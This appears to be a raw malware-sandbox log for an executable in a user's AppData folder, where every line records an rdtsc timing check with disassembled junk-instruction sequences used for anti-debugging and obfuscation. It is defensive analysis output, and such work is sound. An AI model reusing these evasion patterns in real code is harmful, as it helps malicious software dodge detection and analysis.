Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C499D2 second address: C499F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E94F51A51h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F0E94F51A4Eh 0x00000011 jg 00007F0E94F51A46h 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C499F9 second address: C49A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FBAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C924 second address: C4C93A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C93A second address: C4C94D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C9A9 second address: C4C9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C9AE second address: C4C9DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FC1h 0x00000008 jg 00007F0E948C9FB6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F0E948C9FC1h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C9DF second address: C4C9E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C9E6 second address: C4CA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dx, 3EE4h 0x0000000c push 00000000h 0x0000000e mov edx, dword ptr [ebp+122D3A9Eh] 0x00000014 jnl 00007F0E948C9FC0h 0x0000001a push D9332C49h 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 jnp 00007F0E948C9FB6h 0x00000028 pop edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CBBF second address: C4CBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CBCB second address: C4CBDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CC32 second address: C4CC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D1BC3h], eax 0x00000011 or di, 0107h 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D3801h], ecx 0x0000001e push 836EBDB3h 0x00000023 push eax 0x00000024 push edx 0x00000025 jo 00007F0E94F51A4Ch 0x0000002b ja 00007F0E94F51A46h 0x00000031 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CC63 second address: C4CC6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CC6A second address: C4CCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 7C9142CDh 0x0000000e mov dword ptr [ebp+122D1C93h], edi 0x00000014 push 00000003h 0x00000016 mov ecx, dword ptr [ebp+122D38F6h] 0x0000001c call 00007F0E94F51A57h 0x00000021 ja 00007F0E94F51A4Ch 0x00000027 mov edi, dword ptr [ebp+122D39DAh] 0x0000002d pop edx 0x0000002e push 00000000h 0x00000030 add dword ptr [ebp+122D3801h], edx 0x00000036 push 00000003h 0x00000038 jne 00007F0E94F51A4Ch 0x0000003e push 7A6F6830h 0x00000043 pushad 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CCC9 second address: C4CD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC5h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 add dword ptr [esp], 459097D0h 0x00000018 mov edx, dword ptr [ebp+122D38C2h] 0x0000001e lea ebx, dword ptr [ebp+1246188Ah] 0x00000024 sub dword ptr [ebp+122D1CC7h], ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C5EF42 second address: C5EF5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F0E94F51A4Eh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6B889 second address: C6B8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F0E948C9FBEh 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F0E948C9FC3h 0x00000015 popad 0x00000016 push ebx 0x00000017 push esi 0x00000018 jp 00007F0E948C9FB6h 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6B8C5 second address: C6B8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BBB3 second address: C6BBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BBB9 second address: C6BBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BBBD second address: C6BBC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BD07 second address: C6BD20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 jng 00007F0E94F51A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BFCB second address: C6BFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E948C9FBBh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop ebx 0x0000000f jnc 00007F0E948C9FD8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BFEC second address: C6BFFE instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F0E94F51A46h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BFFE second address: C6C002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6C11D second address: C6C13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0E94F51A46h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E94F51A52h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6C2F7 second address: C6C302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E948C9FB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6C302 second address: C6C31B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E94F51A52h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6C5A7 second address: C6C5B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0E948C9FB6h 0x00000009 jl 00007F0E948C9FB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C34479 second address: C3447D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3447D second address: C34483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6CB59 second address: C6CB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6CB5D second address: C6CB77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FBDh 0x00000008 jc 00007F0E948C9FB6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D0DB second address: C6D10C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E94F51A46h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E94F51A58h 0x00000014 jmp 00007F0E94F51A4Ah 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D10C second address: C6D112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D112 second address: C6D116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D4DE second address: C6D4E8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0E948C9FBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D4E8 second address: C6D549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E94F51A56h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jc 00007F0E94F51A52h 0x00000014 jmp 00007F0E94F51A4Ch 0x00000019 push esi 0x0000001a jmp 00007F0E94F51A57h 0x0000001f pop esi 0x00000020 pushad 0x00000021 jmp 00007F0E94F51A54h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D7EA second address: C6D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0E948C9FB6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D7F7 second address: C6D7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C70CE1 second address: C70CE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C70CE6 second address: C70D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007F0E94F51A5Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F0E94F51A58h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jo 00007F0E94F51A4Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C70D31 second address: C70D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FBCh 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F0E948C9FBCh 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6FBB9 second address: C6FBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C70E1A second address: C70E21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C777CA second address: C777D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C777D0 second address: C777D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77950 second address: C77954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77A9E second address: C77AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBFh 0x00000009 js 00007F0E948C9FB6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77AB7 second address: C77AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77AC1 second address: C77ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0E948C9FB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77ACB second address: C77ADF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77ADF second address: C77AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77AE3 second address: C77AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77AE9 second address: C77AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7801D second address: C78021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C78021 second address: C78052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC3h 0x00000007 pushad 0x00000008 jmp 00007F0E948C9FC7h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C78052 second address: C78058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C782EA second address: C78309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F0E948C9FB6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C79E76 second address: C79E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C79F53 second address: C79F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C79F57 second address: C79F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A043 second address: C7A049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A049 second address: C7A04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A5C9 second address: C7A5D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E948C9FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A5D3 second address: C7A5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A5D9 second address: C7A5DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A7C6 second address: C7A7E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7AE9D second address: C7AF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F0E948C9FB8h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F0E948C9FBEh 0x00000016 nop 0x00000017 mov edi, 5D98FFADh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F0E948C9FB8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D1E14h], esi 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 jmp 00007F0E948C9FBCh 0x00000047 jp 00007F0E948C9FBCh 0x0000004d jnc 00007F0E948C9FB6h 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7B954 second address: C7B958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7B958 second address: C7B95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7B95C second address: C7B962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7C8F5 second address: C7C90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E948C9FC0h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7D412 second address: C7D418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7D1D3 second address: C7D1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7DE01 second address: C7DE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7DE05 second address: C7DE09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7EB1F second address: C7EB88 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F0E94F51A48h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F0E94F51A48h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov esi, 5F741A67h 0x00000046 push 00000000h 0x00000048 pushad 0x00000049 sub dx, 3DC2h 0x0000004e or ecx, dword ptr [ebp+1247ABB6h] 0x00000054 popad 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7E869 second address: C7E86F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7EB88 second address: C7EB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7F65C second address: C7F660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7F364 second address: C7F368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8469E second address: C846C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0E948C9FC8h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C846C1 second address: C846D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A51h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C846D7 second address: C846E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C393B9 second address: C393BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
